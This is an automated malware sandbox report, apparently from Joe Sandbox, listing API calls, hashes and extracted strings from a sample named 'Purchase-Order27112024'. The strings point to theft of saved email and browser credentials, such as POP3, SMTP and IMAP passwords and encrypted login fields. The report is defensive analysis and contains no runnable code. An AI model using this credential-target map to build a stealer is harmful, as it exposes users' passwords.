                                                                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                                      • String ID: Arial
                                                                                                      • API String ID: 3853255127-493054409
                                                                                                      • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                      • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                      • String ID: /stext
                                                                                                      • API String ID: 520177685-3817206916
                                                                                                      • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                      • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 145871493-0
                                                                                                      • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                      • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4165544737-0
                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                      APIs
                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumNamesResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334572018-0
                                                                                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID:
                                                                                                      • API String ID: 71445658-0
                                                                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                      • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                      • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                      • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                      • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,75B4EB20,?,00000000), ref: 00402533
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                      • API String ID: 168965057-606283353
                                                                                                      • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                      • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2998058495-0
                                                                                                      • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                      • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                      APIs
